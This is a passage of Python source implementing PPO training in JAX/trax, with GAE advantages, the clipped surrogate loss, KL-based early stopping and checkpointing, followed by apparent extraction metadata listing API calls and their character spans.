The formula for a GAE advantage estimator is as follows:
A_{bt} = \sum_{l=0}^{\infty}(\gamma * \lambda)^{l}(\delta_{b,t+l}).
Internally we just call rewards_to_go, since it is the same computation.
Args:
td_deltas: np.ndarray of shape (B, T) of one step TD-residuals.
    mask: np.ndarray of shape (B, T) of mask for the residuals. It may be the
case that the `td_deltas` are already masked correctly since they are
produced by `deltas(...)`
lambda_: float, lambda parameter for GAE estimators.
    gamma: float, gamma (discount) parameter for GAE estimators.
Returns:
GAE advantage estimates.
"""
return rewards_to_go(td_deltas, mask, lambda_ * gamma)
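# Note (added for clarity): expanding the sum in the docstring gives the usual
# GAE recurrence A_t = delta_t + (gamma * lambda) * A_{t+1}, which is why
# rewards_to_go with discount gamma * lambda computes exactly this quantity.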
def chosen_probabs(probab_observations, actions):
"""Picks out the probabilities of the actions along batch and time-steps.
Args:
probab_observations: ndarray of shape `[B, T+1, A]`, where
probab_observations[b, t, i] contains the log-probability of action = i at
the t^th time-step in the b^th trajectory.
actions: ndarray of shape `[B, T]`, with each entry in [0, A) denoting which
action was chosen in the b^th trajectory's t^th time-step.
Returns:
`[B, T]` ndarray with the log-probabilities of the chosen actions.
"""
B, T = actions.shape # pylint: disable=invalid-name
assert (B, T + 1) == probab_observations.shape[:2]
return probab_observations[np.arange(B)[:, None], np.arange(T), actions]
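# Equivalent loop form (illustrative; the fancy indexing above computes this in
# one shot): out[b, t] = probab_observations[b, t, actions[b, t]]
# for every b < B and t < T.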
def compute_probab_ratios(p_new, p_old, actions, reward_mask):
"""Computes the probability ratios for each time-step in a trajectory.
Args:
p_new: ndarray of shape [B, T+1, A] of the log-probabilities that the policy
network assigns to all the actions at each time-step in each batch using
      the new parameters.
p_old: ndarray of shape [B, T+1, A], same as above, but using old policy
network parameters.
actions: ndarray of shape [B, T] where each element is from [0, A).
reward_mask: ndarray of shape [B, T] masking over probabilities.
Returns:
probab_ratios: ndarray of shape [B, T], where
probab_ratios_{b,t} = p_new_{b,t,action_{b,t}} / p_old_{b,t,action_{b,t}}
"""
B, T = actions.shape # pylint: disable=invalid-name
assert (B, T + 1) == p_old.shape[:2]
assert (B, T + 1) == p_new.shape[:2]
logp_old = chosen_probabs(p_old, actions)
logp_new = chosen_probabs(p_new, actions)
assert (B, T) == logp_old.shape
assert (B, T) == logp_new.shape
# Since these are log-probabilities, we just subtract them.
probab_ratios = np.exp(logp_new - logp_old) * reward_mask
assert (B, T) == probab_ratios.shape
return probab_ratios
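# Note (added for clarity): since the inputs are log-probabilities,
# exp(logp_new - logp_old) equals p_new / p_old; padded time-steps are zeroed
# out by reward_mask.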
def clipped_probab_ratios(probab_ratios, epsilon=0.2):
return np.clip(probab_ratios, 1 - epsilon, 1 + epsilon)
def clipped_objective(probab_ratios, advantages, reward_mask, epsilon=0.2):
return np.minimum(
probab_ratios * advantages,
clipped_probab_ratios(probab_ratios, epsilon=epsilon) *
advantages) * reward_mask
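# Note (added for clarity): this is the standard PPO clipped surrogate,
#   min(ratio_t * A_t, clip(ratio_t, 1 - epsilon, 1 + epsilon) * A_t),
# evaluated only where reward_mask is 1.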
@jit
def ppo_loss_given_predictions(log_probab_actions_new,
log_probab_actions_old,
value_predictions_old,
padded_actions,
padded_rewards,
reward_mask,
gamma=0.99,
lambda_=0.95,
epsilon=0.2):
"""PPO objective, with an eventual minus sign, given predictions."""
B, T = padded_rewards.shape # pylint: disable=invalid-name
assert (B, T) == padded_actions.shape
assert (B, T) == reward_mask.shape
_, _, A = log_probab_actions_old.shape # pylint: disable=invalid-name
assert (B, T + 1, 1) == value_predictions_old.shape
assert (B, T + 1, A) == log_probab_actions_old.shape
assert (B, T + 1, A) == log_probab_actions_new.shape
# (B, T)
td_deltas = deltas(
np.squeeze(value_predictions_old, axis=2), # (B, T+1)
padded_rewards,
reward_mask,
gamma=gamma)
# (B, T)
advantages = gae_advantages(
td_deltas, reward_mask, lambda_=lambda_, gamma=gamma)
# Normalize the advantages.
advantages = (advantages - np.mean(advantages)) / np.std(advantages)
# (B, T)
ratios = compute_probab_ratios(log_probab_actions_new, log_probab_actions_old,
padded_actions, reward_mask)
assert (B, T) == ratios.shape
# (B, T)
objective = clipped_objective(
ratios, advantages, reward_mask, epsilon=epsilon)
assert (B, T) == objective.shape
# ()
average_objective = np.sum(objective) / np.sum(reward_mask)
# Loss is negative objective.
return -average_objective
@jit
def combined_loss_given_predictions(log_probab_actions_new,
log_probab_actions_old,
value_prediction_new,
value_prediction_old,
padded_actions,
padded_rewards,
reward_mask,
gamma=0.99,
lambda_=0.95,
epsilon=0.2,
c1=1.0,
c2=0.01):
"""Computes the combined (clipped loss + value loss) given predictions."""
loss_value = value_loss_given_predictions(
value_prediction_new,
padded_rewards,
reward_mask,
gamma=gamma,
value_prediction_old=value_prediction_old,
epsilon=epsilon)
loss_ppo = ppo_loss_given_predictions(
log_probab_actions_new,
log_probab_actions_old,
value_prediction_old,
padded_actions,
padded_rewards,
reward_mask,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon)
entropy_bonus = masked_entropy(log_probab_actions_new, reward_mask)
return (loss_ppo + (c1 * loss_value) - (c2 * entropy_bonus), loss_ppo,
loss_value, entropy_bonus)
@functools.partial(jit, static_argnums=(3,))
def combined_loss(new_params,
log_probab_actions_old,
value_predictions_old,
policy_and_value_net_apply,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
gamma=0.99,
lambda_=0.95,
epsilon=0.2,
c1=1.0,
c2=0.01,
rng=None):
"""Computes the combined (clipped loss + value loss) given observations."""
log_probab_actions_new, value_predictions_new = policy_and_value_net_apply(
padded_observations, new_params, rng=rng)
# (combined_loss, ppo_loss, value_loss, entropy_bonus)
return combined_loss_given_predictions(
log_probab_actions_new,
log_probab_actions_old,
value_predictions_new,
value_predictions_old,
padded_actions,
padded_rewards,
reward_mask,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon,
c1=c1,
c2=c2)
@functools.partial(jit, static_argnums=(2, 3, 4))
def policy_and_value_opt_step(i,
opt_state,
opt_update,
get_params,
policy_and_value_net_apply,
log_probab_actions_old,
value_predictions_old,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
c1=1.0,
c2=0.01,
gamma=0.99,
lambda_=0.95,
epsilon=0.1,
rng=None):
"""Policy and Value optimizer step."""
# Combined loss function given the new params.
def policy_and_value_loss(params):
"""Returns the combined loss given just parameters."""
(loss, _, _, _) = combined_loss(
params,
log_probab_actions_old,
value_predictions_old,
policy_and_value_net_apply,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
c1=c1,
c2=c2,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon,
rng=rng)
return loss
new_params = get_params(opt_state)
g = grad(policy_and_value_loss)(new_params)
# TODO(afrozm): Maybe clip gradients?
return opt_update(i, g, opt_state)
def get_time(t1, t2=None):
if t2 is None:
t2 = time.time()
return round((t2 - t1) * 1000, 2)
def approximate_kl(log_prob_new, log_prob_old, mask):
"""Computes the approximate KL divergence between the old and new log-probs.
Args:
log_prob_new: (B, T+1, A) log probs new
log_prob_old: (B, T+1, A) log probs old
mask: (B, T)
Returns:
Approximate KL.
"""
diff = log_prob_old - log_prob_new
# Cut the last time-step out.
diff = diff[:, :-1]
# Mask out the irrelevant part.
diff *= mask[:, :, np.newaxis] # make mask (B, T, 1)
# Average on non-masked part.
return np.sum(diff) / np.sum(mask)
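# Note (added for clarity): the training loop compares this estimate against
# 1.5 * target_kl to decide whether to early-stop the optimization steps.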
def masked_entropy(log_probs, mask):
"""Computes the entropy for the given log-probs.
Args:
log_probs: (B, T+1, A) log probs
mask: (B, T) mask.
Returns:
Entropy.
"""
# Cut the last time-step out.
lp = log_probs[:, :-1]
# Mask out the irrelevant part.
lp *= mask[:, :, np.newaxis] # make mask (B, T, 1)
p = np.exp(lp) * mask[:, :, np.newaxis] # (B, T, 1)
# Average on non-masked part and take negative.
return -(np.sum(lp * p) / np.sum(mask))
def evaluate_policy(eval_env,
get_predictions,
boundary,
max_timestep=20000,
rng=None):
"""Evaluate the policy."""
avg_rewards = {}
for policy in [
env_problem_utils.CATEGORICAL_SAMPLING, env_problem_utils.GUMBEL_SAMPLING,
env_problem_utils.EPSILON_GREEDY
]:
trajs, _ = env_problem_utils.play_env_problem_with_policy(
eval_env,
get_predictions,
boundary=boundary,
max_timestep=max_timestep,
reset=True,
policy_sampling=policy,
rng=rng)
avg_rewards[policy] = float(sum(
np.sum(traj[2]) for traj in trajs)) / len(trajs)
return avg_rewards
def maybe_restore_params(output_dir, policy_and_value_net_params):
"""Maybe restore the params from the checkpoint dir.
Args:
output_dir: Directory where saved model checkpoints are stored.
    policy_and_value_net_params: Default params, returned if model isn't found.
Returns:
triple (restore (bool), params, iter(int)) where iter is the epoch from
    which we restored the params, or 0 if restore is False.
"""
model_files = gfile.glob(os.path.join(output_dir, "model-??????.pkl"))
if not model_files:
return False, policy_and_value_net_params, 0
model_file = sorted(model_files)[-1]
model_file_basename = os.path.basename(model_file) # model-??????.pkl
  i = int("".join(filter(str.isdigit, model_file_basename)))  # e.g. "model-000123.pkl" -> 123
with gfile.GFile(model_file, "rb") as f:
policy_and_value_net_params = pickle.load(f)
return True, policy_and_value_net_params, i
def training_loop(
env=None,
epochs=EPOCHS,
policy_and_value_net_fun=None,
policy_and_value_optimizer_fun=None,
batch_size=BATCH_TRAJECTORIES,
num_optimizer_steps=NUM_OPTIMIZER_STEPS,
print_every_optimizer_steps=PRINT_EVERY_OPTIMIZER_STEP,
target_kl=0.01,
boundary=20,
max_timestep=None,
max_timestep_eval=20000,
random_seed=None,
gamma=GAMMA,
lambda_=LAMBDA,
epsilon=EPSILON,
c1=1.0,
c2=0.01,
output_dir=None,
eval_every_n=1000,
eval_env=None,
done_frac_for_policy_save=0.5,
enable_early_stopping=True,
env_name=None,
):
"""Runs the training loop for PPO, with fixed policy and value nets."""
assert env
assert output_dir
assert env_name
gfile.makedirs(output_dir)
# Create summary writers and history.
train_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "train"))
timing_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "timing"))
eval_sw = jaxboard.SummaryWriter(os.path.join(output_dir, "eval"))
train_sw.text("env_name", env_name)
timing_sw.text("env_name", env_name)
eval_sw.text("env_name", env_name)
jax_rng_key = trax.get_random_number_generator_and_set_seed(random_seed)
# Batch Observations Shape = [-1, -1] + OBS, because we will eventually call
  # policy and value networks on shape [B, T] + OBS
batch_observations_shape = (-1, -1) + env.observation_space.shape
assert isinstance(env.action_space, gym.spaces.Discrete)
num_actions = env.action_space.n
jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2)
# Initialize the policy and value network.
policy_and_value_net_params, policy_and_value_net_apply = (
policy_and_value_net_fun(key1, batch_observations_shape, num_actions))
# Maybe restore the policy params. If there is nothing to restore, then
# iteration = 0 and policy_and_value_net_params are returned as is.
restore, policy_and_value_net_params, iteration = (
maybe_restore_params(output_dir, policy_and_value_net_params))
if restore:
logging.info("Restored parameters from iteration [%d]", iteration)
# We should start from the next iteration.
iteration += 1
policy_and_value_net_apply = jit(policy_and_value_net_apply)
# Initialize the optimizers.
policy_and_value_optimizer = (
policy_and_value_optimizer_fun(policy_and_value_net_params))
(policy_and_value_opt_state, policy_and_value_opt_update,
policy_and_value_get_params) = policy_and_value_optimizer
num_trajectories_done = 0
last_saved_at = 0
logging.info("Starting the PPO training loop.")
for i in range(iteration, epochs):
epoch_start_time = time.time()
# Params we'll use to collect the trajectories.
policy_and_value_net_params = policy_and_value_get_params(
policy_and_value_opt_state)
# A function to get the policy and value predictions.
def get_predictions(observations, rng=None):
"""Returns log-probs, value predictions and key back."""
key, key1 = jax_random.split(rng, num=2)
log_probs, value_preds = policy_and_value_net_apply(
observations, policy_and_value_net_params, rng=key1)
return log_probs, value_preds, key
# Evaluate the policy.
policy_eval_start_time = time.time()
if ((i + 1) % eval_every_n == 0) or (i == epochs - 1):
jax_rng_key, key = jax_random.split(jax_rng_key, num=2)
logging.vlog(1, "Epoch [% 6d] evaluating policy.", i)
avg_reward = evaluate_policy(
eval_env,
get_predictions,
boundary,
max_timestep=max_timestep_eval,
rng=key)
for k, v in avg_reward.items():
eval_sw.scalar("eval/mean_reward/%s" % k, v, step=i)
logging.info("Epoch [% 6d] Policy Evaluation [%s] = %10.2f", i, k, v)
policy_eval_time = get_time(policy_eval_start_time)
trajectory_collection_start_time = time.time()
logging.vlog(1, "Epoch [% 6d] collecting trajectories.", i)
jax_rng_key, key = jax_random.split(jax_rng_key)
trajs, num_done = collect_trajectories(
env,
policy_fun=get_predictions,
num_trajectories=batch_size,
max_timestep=max_timestep,
boundary=boundary,
rng=key,
reset=(i == 0) or restore,
epsilon=(10.0 / (i + 10.0))) # this is a different epsilon.
trajectory_collection_time = get_time(trajectory_collection_start_time)
logging.vlog(1, "Collecting trajectories took %0.2f msec.",
trajectory_collection_time)
avg_reward = float(sum(np.sum(traj[2]) for traj in trajs)) / len(trajs)
max_reward = max(np.sum(traj[2]) for traj in trajs)
min_reward = min(np.sum(traj[2]) for traj in trajs)
train_sw.scalar("train/mean_reward", avg_reward, step=i)
logging.vlog(1, "Rewards avg=[%0.2f], max=[%0.2f], min=[%0.2f], all=%s",
avg_reward, max_reward, min_reward,
[float(np.sum(traj[2])) for traj in trajs])
logging.vlog(1,
"Trajectory Length average=[%0.2f], max=[%0.2f], min=[%0.2f]",
float(sum(len(traj[0]) for traj in trajs)) / len(trajs),
max(len(traj[0]) for traj in trajs),
min(len(traj[0]) for traj in trajs))
logging.vlog(2, "Trajectory Lengths: %s", [len(traj[0]) for traj in trajs])
padding_start_time = time.time()
(_, reward_mask, padded_observations, padded_actions,
padded_rewards) = pad_trajectories(
trajs, boundary=boundary)
padding_time = get_time(padding_start_time)
logging.vlog(1, "Padding trajectories took %0.2f msec.",
get_time(padding_start_time))
logging.vlog(1, "Padded Observations' shape [%s]",
str(padded_observations.shape))
logging.vlog(1, "Padded Actions' shape [%s]", str(padded_actions.shape))
logging.vlog(1, "Padded Rewards' shape [%s]", str(padded_rewards.shape))
# Calculate log-probabilities and value predictions of the trajectories.
# We'll pass these to the loss functions so as to not get recomputed.
# NOTE:
# There is a slight problem here, if the policy network contains
# stochasticity in the log-probabilities (ex: dropout), then calculating
# these again here is not going to be correct and should be done in the
# collect function.
log_prob_recompute_start_time = time.time()
jax_rng_key, key = jax_random.split(jax_rng_key)
log_probabs_traj, value_predictions_traj, _ = get_predictions(
padded_observations, rng=key)
log_prob_recompute_time = get_time(log_prob_recompute_start_time)
# Some assertions.
B, T = padded_actions.shape # pylint: disable=invalid-name
assert (B, T) == padded_rewards.shape
assert (B, T) == reward_mask.shape
assert (B, T + 1) == padded_observations.shape[:2]
assert (B, T + 1) + env.observation_space.shape == padded_observations.shape
# Linear annealing from 0.1 to 0.0
# epsilon_schedule = epsilon if epochs == 1 else epsilon * (1.0 -
# (i /
# (epochs - 1)))
# Constant epsilon.
epsilon_schedule = epsilon
# Compute value and ppo losses.
jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2)
logging.vlog(2, "Starting to compute P&V loss.")
loss_compute_start_time = time.time()
cur_combined_loss, cur_ppo_loss, cur_value_loss, entropy_bonus = (
combined_loss(
policy_and_value_net_params,
log_probabs_traj,
value_predictions_traj,
policy_and_value_net_apply,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon_schedule,
c1=c1,
c2=c2,
rng=key1))
loss_compute_time = get_time(loss_compute_start_time)
logging.vlog(
1,
"Calculating P&V loss [%10.2f(%10.2f, %10.2f, %10.2f)] took %0.2f msec.",
cur_combined_loss, cur_value_loss, cur_ppo_loss, entropy_bonus,
get_time(loss_compute_start_time))
jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2)
logging.vlog(1, "Policy and Value Optimization")
optimization_start_time = time.time()
keys = jax_random.split(key1, num=num_optimizer_steps)
for j in range(num_optimizer_steps):
k1, k2, k3 = jax_random.split(keys[j], num=3)
t = time.time()
# Update the optimizer state.
policy_and_value_opt_state = policy_and_value_opt_step(
j,
policy_and_value_opt_state,
policy_and_value_opt_update,
policy_and_value_get_params,
policy_and_value_net_apply,
log_probabs_traj,
value_predictions_traj,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
c1=c1,
c2=c2,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon_schedule,
rng=k1)
# Compute the approx KL for early stopping.
new_policy_and_value_net_params = policy_and_value_get_params(
policy_and_value_opt_state)
log_probab_actions_new, _ = policy_and_value_net_apply(
padded_observations, new_policy_and_value_net_params, rng=k2)
approx_kl = approximate_kl(log_probab_actions_new, log_probabs_traj,
reward_mask)
early_stopping = enable_early_stopping and approx_kl > 1.5 * target_kl
if early_stopping:
logging.vlog(
1, "Early stopping policy and value optimization at iter: %d, "
"with approx_kl: %0.2f", j, approx_kl)
# We don't return right-away, we want the below to execute on the last
# iteration.
t2 = time.time()
if (((j + 1) % print_every_optimizer_steps == 0) or
(j == num_optimizer_steps - 1) or early_stopping):
# Compute and log the loss.
(loss_combined, loss_ppo, loss_value, entropy_bonus) = (
combined_loss(
new_policy_and_value_net_params,
log_probabs_traj,
value_predictions_traj,
policy_and_value_net_apply,
padded_observations,
padded_actions,
padded_rewards,
reward_mask,
gamma=gamma,
lambda_=lambda_,
epsilon=epsilon_schedule,
c1=c1,
c2=c2,
rng=k3))
logging.vlog(1, "One Policy and Value grad desc took: %0.2f msec",
get_time(t, t2))
logging.vlog(
1, "Combined Loss(value, ppo, entropy_bonus) [%10.2f] ->"
" [%10.2f(%10.2f,%10.2f,%10.2f)]", cur_combined_loss, loss_combined,
loss_value, loss_ppo, entropy_bonus)
if early_stopping:
break
optimization_time = get_time(optimization_start_time)
logging.vlog(
1, "Total Combined Loss reduction [%0.2f]%%",
(100 * (cur_combined_loss - loss_combined) / np.abs(cur_combined_loss)))
# Save parameters every time we see the end of at least a fraction of batch
# number of trajectories that are done (not completed -- completed includes
# truncated and done).
# Also don't save too frequently, enforce a minimum gap.
# Or if this is the last iteration.
policy_save_start_time = time.time()
num_trajectories_done += num_done
if (((num_trajectories_done >= done_frac_for_policy_save * batch_size)
and (i - last_saved_at > eval_every_n)) or (i == epochs - 1)):
logging.vlog(1, "Epoch [% 6d] saving model.", i)
params_file = os.path.join(output_dir, "model-%06d.pkl" % i)
with gfile.GFile(params_file, "wb") as f:
pickle.dump(policy_and_value_net_params, f)
# Reset this number.
num_trajectories_done = 0
last_saved_at = i
policy_save_time = get_time(policy_save_start_time)
epoch_time = get_time(epoch_start_time)
logging.info(
"Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined"
" Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]", i, min_reward,
max_reward, avg_reward, loss_combined, loss_value, loss_ppo,
entropy_bonus)
timing_dict = {
"epoch": epoch_time,
"policy_eval": policy_eval_time,
"trajectory_collection": trajectory_collection_time,
"padding": padding_time,
"log_prob_recompute": log_prob_recompute_time,
"loss_compute": loss_compute_time,
"optimization": optimization_time,
"policy_save": policy_save_time,
}
for k, v in timing_dict.items():
timing_sw.scalar("timing/%s" % k, v, step=i)
max_key_len = max(len(k) for k in timing_dict)
timing_info_list = [
"%s : % 10.2f" % (k.rjust(max_key_len + 1), v)
for k, v in sorted(timing_dict.items())
]
logging.info("Epoch [% 6d], Timings: \n%s", i, "\n".join(timing_info_list))
# Reset restore.
restore = False
# Flush summary writers once in a while.
if (i+1) % 1000 == 0 or i == epochs - 1:
train_sw.flush()
timing_sw.flush()
eval_sw.flush()
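# Illustrative invocation sketch (not part of the original file); assumes
# `train_env` and `eval_env` are EnvProblem instances and the output directory
# is writable:
#
#   training_loop(
#       env=train_env,
#       eval_env=eval_env,
#       env_name="my_env",
#       policy_and_value_net_fun=policy_and_value_net,
#       policy_and_value_optimizer_fun=optimizer_fun,
#       output_dir="/tmp/ppo",
#       epochs=EPOCHS)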
| [
"jax.numpy.abs",
"tensor2tensor.trax.trax.get_random_number_generator_and_set_seed",
"absl.logging.info",
"tensor2tensor.trax.optimizers.Adam",
"jax.jit",
"jax.numpy.mean",
"jax.random.split",
"tensor2tensor.trax.layers.LogSoftmax",
"tensorflow.io.gfile.GFile",
"jax.numpy.std",
"absl.logging.vlog",
"jax.numpy.uint8",
"tensor2tensor.envs.env_problem_utils.play_env_problem_with_policy",
"jax.numpy.uint16",
"pickle.load",
"tensor2tensor.trax.layers.Dense",
"tensor2tensor.trax.layers.Serial",
"jax.numpy.clip",
"jax.numpy.stack",
"time.time",
"numpy.ones_like",
"pickle.dump",
"jax.numpy.arange",
"jax.numpy.exp",
"jax.lax.pad",
"os.path.join",
"jax.numpy.array",
"tensorflow.io.gfile.makedirs",
"jax.numpy.sum",
"jax.numpy.maximum",
"functools.partial",
"os.path.basename",
"jax.grad",
"jax.numpy.squeeze"
]
| [((20220, 20263), 'functools.partial', 'functools.partial', (['jit'], {'static_argnums': '(3,)'}), '(jit, static_argnums=(3,))\n', (20237, 20263), False, 'import functools\n'), ((21315, 21363), 'functools.partial', 'functools.partial', (['jit'], {'static_argnums': '(2, 3, 4)'}), '(jit, static_argnums=(2, 3, 4))\n', (21332, 21363), False, 'import functools\n'), ((3762, 3825), 'tensor2tensor.trax.optimizers.Adam', 'trax_opt.Adam', ([], {'step_size': 'step_size', 'b1': '(0.9)', 'b2': '(0.999)', 'eps': '(1e-08)'}), '(step_size=step_size, b1=0.9, b2=0.999, eps=1e-08)\n', (3775, 3825), True, 'from tensor2tensor.trax import optimizers as trax_opt\n'), ((5850, 6062), 'tensor2tensor.envs.env_problem_utils.play_env_problem_with_policy', 'env_problem_utils.play_env_problem_with_policy', (['env', 'policy_fun'], {'num_trajectories': 'num_trajectories', 'max_timestep': 'max_timestep', 'boundary': 'boundary', 'policy_sampling': 'policy', 'eps': 'epsilon', 'reset': 'reset', 'rng': 'rng'}), '(env, policy_fun,\n num_trajectories=num_trajectories, max_timestep=max_timestep, boundary=\n boundary, policy_sampling=policy, eps=epsilon, reset=reset, rng=rng)\n', (5896, 6062), False, 'from tensor2tensor.envs import env_problem_utils\n'), ((12385, 12421), 'jax.numpy.squeeze', 'np.squeeze', (['value_prediction'], {'axis': '(2)'}), '(value_prediction, axis=2)\n', (12395, 12421), True, 'from jax import numpy as np\n'), ((16885, 16933), 'jax.numpy.clip', 'np.clip', (['probab_ratios', '(1 - epsilon)', '(1 + epsilon)'], {}), '(probab_ratios, 1 - epsilon, 1 + epsilon)\n', (16892, 16933), True, 'from jax import numpy as np\n'), ((25327, 25355), 'os.path.basename', 'os.path.basename', (['model_file'], {}), '(model_file)\n', (25343, 25355), False, 'import os\n'), ((26310, 26336), 'tensorflow.io.gfile.makedirs', 'gfile.makedirs', (['output_dir'], {}), '(output_dir)\n', (26324, 26336), False, 'from tensorflow.io import gfile\n'), ((26723, 26781), 'tensor2tensor.trax.trax.get_random_number_generator_and_set_seed', 'trax.get_random_number_generator_and_set_seed', (['random_seed'], {}), '(random_seed)\n', (26768, 26781), False, 'from tensor2tensor.trax import trax\n'), ((27100, 27136), 'jax.random.split', 'jax_random.split', (['jax_rng_key'], {'num': '(2)'}), '(jax_rng_key, num=2)\n', (27116, 27136), True, 'from jax import random as jax_random\n'), ((27774, 27805), 'jax.jit', 'jit', (['policy_and_value_net_apply'], {}), '(policy_and_value_net_apply)\n', (27777, 27805), False, 'from jax import jit\n'), ((28111, 28158), 'absl.logging.info', 'logging.info', (['"""Starting the PPO training loop."""'], {}), "('Starting the PPO training loop.')\n", (28123, 28158), False, 'from absl import logging\n'), ((3260, 3281), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', (['*tower'], {}), '(*tower)\n', (3273, 3281), False, 'from tensor2tensor.trax import layers\n'), ((6385, 6396), 'jax.numpy.uint8', 'np.uint8', (['(0)'], {}), '(0)\n', (6393, 6396), True, 'from jax import numpy as np\n'), ((8773, 8814), 'jax.lax.pad', 'lax.pad', (['o', 'padding_value', 'padding_config'], {}), '(o, padding_value, padding_config)\n', (8780, 8814), False, 'from jax import lax\n'), ((8997, 9045), 'jax.lax.pad', 'lax.pad', (['a', 'action_padding_value', 'padding_config'], {}), '(a, action_padding_value, padding_config)\n', (9004, 9045), False, 'from jax import lax\n'), ((9107, 9155), 'jax.lax.pad', 'lax.pad', (['r', 'reward_padding_value', 'padding_config'], {}), '(r, reward_padding_value, padding_config)\n', (9114, 9155), False, 'from jax import lax\n'), 
((9257, 9289), 'numpy.ones_like', 'onp.ones_like', (['r'], {'dtype': 'np.int32'}), '(r, dtype=np.int32)\n', (9270, 9289), True, 'import numpy as onp\n'), ((9381, 9403), 'jax.numpy.stack', 'np.stack', (['reward_masks'], {}), '(reward_masks)\n', (9389, 9403), True, 'from jax import numpy as np\n'), ((9405, 9434), 'jax.numpy.stack', 'np.stack', (['padded_observations'], {}), '(padded_observations)\n', (9413, 9434), True, 'from jax import numpy as np\n'), ((9443, 9467), 'jax.numpy.stack', 'np.stack', (['padded_actions'], {}), '(padded_actions)\n', (9451, 9467), True, 'from jax import numpy as np\n'), ((9469, 9493), 'jax.numpy.stack', 'np.stack', (['padded_rewards'], {}), '(padded_rewards)\n', (9477, 9493), True, 'from jax import numpy as np\n'), ((11201, 11223), 'jax.numpy.stack', 'np.stack', (['r2gs'], {'axis': '(1)'}), '(r2gs, axis=1)\n', (11209, 11223), True, 'from jax import numpy as np\n'), ((12714, 12754), 'jax.numpy.squeeze', 'np.squeeze', (['value_prediction_old'], {'axis': '(2)'}), '(value_prediction_old, axis=2)\n', (12724, 12754), True, 'from jax import numpy as np\n'), ((13017, 13049), 'jax.numpy.maximum', 'np.maximum', (['v_clipped_loss', 'loss'], {}), '(v_clipped_loss, loss)\n', (13027, 13049), True, 'from jax import numpy as np\n'), ((13116, 13128), 'jax.numpy.sum', 'np.sum', (['loss'], {}), '(loss)\n', (13122, 13128), True, 'from jax import numpy as np\n'), ((13131, 13150), 'jax.numpy.sum', 'np.sum', (['reward_mask'], {}), '(reward_mask)\n', (13137, 13150), True, 'from jax import numpy as np\n'), ((16715, 16742), 'jax.numpy.exp', 'np.exp', (['(logp_new - logp_old)'], {}), '(logp_new - logp_old)\n', (16721, 16742), True, 'from jax import numpy as np\n'), ((18091, 18132), 'jax.numpy.squeeze', 'np.squeeze', (['value_predictions_old'], {'axis': '(2)'}), '(value_predictions_old, axis=2)\n', (18101, 18132), True, 'from jax import numpy as np\n'), ((18392, 18410), 'jax.numpy.std', 'np.std', (['advantages'], {}), '(advantages)\n', (18398, 18410), True, 'from jax import numpy as np\n'), ((18764, 18781), 'jax.numpy.sum', 'np.sum', (['objective'], {}), '(objective)\n', (18770, 18781), True, 'from jax import numpy as np\n'), ((18784, 18803), 'jax.numpy.sum', 'np.sum', (['reward_mask'], {}), '(reward_mask)\n', (18790, 18803), True, 'from jax import numpy as np\n'), ((22735, 22762), 'jax.grad', 'grad', (['policy_and_value_loss'], {}), '(policy_and_value_loss)\n', (22739, 22762), False, 'from jax import grad\n'), ((22907, 22918), 'time.time', 'time.time', ([], {}), '()\n', (22916, 22918), False, 'import time\n'), ((23464, 23476), 'jax.numpy.sum', 'np.sum', (['diff'], {}), '(diff)\n', (23470, 23476), True, 'from jax import numpy as np\n'), ((23479, 23491), 'jax.numpy.sum', 'np.sum', (['mask'], {}), '(mask)\n', (23485, 23491), True, 'from jax import numpy as np\n'), ((23833, 23843), 'jax.numpy.exp', 'np.exp', (['lp'], {}), '(lp)\n', (23839, 23843), True, 'from jax import numpy as np\n'), ((24351, 24523), 'tensor2tensor.envs.env_problem_utils.play_env_problem_with_policy', 'env_problem_utils.play_env_problem_with_policy', (['eval_env', 'get_predictions'], {'boundary': 'boundary', 'max_timestep': 'max_timestep', 'reset': '(True)', 'policy_sampling': 'policy', 'rng': 'rng'}), '(eval_env, get_predictions,\n boundary=boundary, max_timestep=max_timestep, reset=True,\n policy_sampling=policy, rng=rng)\n', (24397, 24523), False, 'from tensor2tensor.envs import env_problem_utils\n'), ((25146, 25190), 'os.path.join', 'os.path.join', (['output_dir', '"""model-??????.pkl"""'], {}), "(output_dir, 
'model-??????.pkl')\n", (25158, 25190), False, 'import os\n'), ((25435, 25464), 'tensorflow.io.gfile.GFile', 'gfile.GFile', (['model_file', '"""rb"""'], {}), "(model_file, 'rb')\n", (25446, 25464), False, 'from tensorflow.io import gfile\n'), ((25505, 25519), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (25516, 25519), False, 'import pickle\n'), ((26414, 26447), 'os.path.join', 'os.path.join', (['output_dir', '"""train"""'], {}), "(output_dir, 'train')\n", (26426, 26447), False, 'import os\n'), ((26486, 26520), 'os.path.join', 'os.path.join', (['output_dir', '"""timing"""'], {}), "(output_dir, 'timing')\n", (26498, 26520), False, 'import os\n'), ((26557, 26589), 'os.path.join', 'os.path.join', (['output_dir', '"""eval"""'], {}), "(output_dir, 'eval')\n", (26569, 26589), False, 'import os\n'), ((27609, 27675), 'absl.logging.info', 'logging.info', (['"""Restored parameters from iteration [%d]"""', 'iteration'], {}), "('Restored parameters from iteration [%d]', iteration)\n", (27621, 27675), False, 'from absl import logging\n'), ((28219, 28230), 'time.time', 'time.time', ([], {}), '()\n', (28228, 28230), False, 'import time\n'), ((28823, 28834), 'time.time', 'time.time', ([], {}), '()\n', (28832, 28834), False, 'import time\n'), ((29455, 29466), 'time.time', 'time.time', ([], {}), '()\n', (29464, 29466), False, 'import time\n'), ((29471, 29530), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Epoch [% 6d] collecting trajectories."""', 'i'], {}), "(1, 'Epoch [% 6d] collecting trajectories.', i)\n", (29483, 29530), False, 'from absl import logging\n'), ((29554, 29583), 